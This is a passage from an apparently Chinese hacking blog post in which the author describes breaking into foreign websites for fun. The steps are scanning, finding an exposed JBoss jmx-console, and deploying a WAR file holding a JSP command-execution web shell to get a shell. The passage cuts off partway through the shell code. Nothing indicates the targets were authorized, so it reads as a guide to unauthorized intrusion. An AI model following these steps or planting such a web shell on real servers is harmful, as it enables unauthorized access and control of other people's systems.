前言
最近感觉有点无聊,搞了国外一些站,学到一些知识,主要了解了windos中一些命令.
1.信息收集
首先访问该站,把目录扫描起,然后nmap扫描看看,然后找该站是否存在什么漏洞。然而并没有,扫描目录发现 8080/jmx-console/,发现是jboss的站,百度到jboss可以部署war包getshell,访问http://xxxx:8080//jmx-console/
2.漏洞利用
全局搜索jboss.system,点击进入
制作war包
把木马文件gg.jsp(我是一个直接执行命令代码)用压缩软件压缩为zip,然后更改后缀为war,然后将该war上传到互联网上能够访问的网
站上
//gg.jsp
<%@ page contentType="text/html;charset=big5" session="false" import="java.io.*" %>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=big5">
</head>
<body>
<%
Runtime runtime = Runtime.